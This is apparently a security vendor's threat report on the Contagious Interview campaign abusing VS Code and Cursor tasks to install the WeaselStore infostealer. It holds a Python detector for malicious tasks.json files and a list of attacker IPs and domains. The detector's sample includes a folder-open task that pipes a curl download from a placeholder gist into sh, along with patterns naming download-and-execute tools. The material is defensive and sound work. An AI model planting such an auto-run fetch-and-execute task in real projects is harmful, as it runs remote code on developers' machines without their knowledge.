Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains Part 2
Summary
*Abstract customers already have visibility into the behaviors described in this report.
This post is a continuation of Part 1, which covered new techniques used in the Contagious Interview campaign. For complete context on VS Code task abuse in the campaign, please see the original post on tracking this vector. In this final part, we expand on the previous post and cover in greater detail what options are currently available to mitigate VS Code Tasks abuse.
Findings
What WeaselStore Has in Store
The previous post observed the use of GitHub Gist-hosted scripts to download and execute next-stage payloads which subsequently led to installation of WeaselStore infostealer/RAT. WeaselStore targeting Windows is implemented in Python (AKA PylangGhost) while the variant targeting macOS is written in Go (AKA GolangGhost). The samples make heavy use of LLM-generated code, and with it comes a number of bugs …
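The chain described above (a VS Code task that fetches a Gist-hosted script and executes it) leaves a footprint in the repository's tasks.json. The following is an added example, not code from the post or from Abstract: a small Python checker that scans a tasks.json document and flags tasks that auto-run on folder open (VS Code's runOptions.runOn = "folderOpen"), reference Gist hosting or generic download/execute utilities, or contain any of the network indicators listed in the IoC section of this post. The sample document, the task labels and the gist URL are constructed placeholders; the list of fetch/execute tool names is an assumed starting point, not a complete one.

```python
import json
import re

# Network indicators copied from the IoC section of this post.
IOC_HOSTS = {
    "23.227.203.99",
    "144.172.115.189",
    "camdriver.pro",
    "ip-checking-notification-firebase-2.vercel.app",
}

# Gist hosting is the delivery pattern the post describes; the tool names are
# generic download/execute utilities (assumption: a reasonable starting list).
REMOTE_FETCH_PATTERNS = [
    r"gist\.github(?:usercontent)?\.com",
    r"\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b",
]

# Constructed sample tasks.json: one benign build task and one auto-run task
# modelled on the fetch-and-execute pattern (gist URL is a placeholder).
SAMPLE_TASKS_JSON = """{
  // constructed sample, not taken from any real repository
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "prepare",
      "type": "shell",
      "command": "curl -sL https://gist.github.com/EXAMPLE/raw/setup.sh | sh",
      "runOptions": {"runOn": "folderOpen"}
    }
  ]
}"""


def _strip_line_comments(text):
    """tasks.json is JSONC; drop whole-line // comments so json.loads accepts it.
    (Naive: does not handle block comments or // inside string values.)"""
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def _task_text(task):
    """Flatten the executable fields of one task entry into one string for matching."""
    parts = []
    for key in ("command", "args", "windows", "osx", "linux"):
        value = task.get(key)
        if value is not None:
            parts.append(json.dumps(value))
    return " ".join(parts)


def analyze_tasks_json(text):
    """Return a list of findings ({label, reasons}) for a tasks.json document."""
    doc = json.loads(_strip_line_comments(text))
    findings = []
    for task in doc.get("tasks", []):
        label = task.get("label", "<unlabeled>")
        blob = _task_text(task)
        reasons = []
        # Tasks that run without user interaction are the highest-risk ones.
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folder open")
        for host in sorted(IOC_HOSTS):
            if host in blob:
                reasons.append(f"references known IoC host {host}")
        for pat in REMOTE_FETCH_PATTERNS:
            if re.search(pat, blob, re.IGNORECASE):
                reasons.append(f"remote fetch/execute pattern {pat!r}")
        if reasons:
            findings.append({"label": label, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze_tasks_json(SAMPLE_TASKS_JSON):
        print(finding["label"], "->", "; ".join(finding["reasons"]))
```

Run it over the .vscode/tasks.json of any repository you are about to open in VS Code or Cursor; a task that both auto-runs on folder open and pulls remote content is the combination worth blocking before trusting the workspace. The IoC host match is the cheapest check and the first to go stale, so the structural signals (auto-run plus fetch/execute) carry more weight over time.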
IoC
http://23.227.203.99:8080
http://camdriver.pro
http://144.172.115.189:8080
https://ip-checking-notification-firebase-2.vercel.app/api
144.172.115.189
23.227.203.99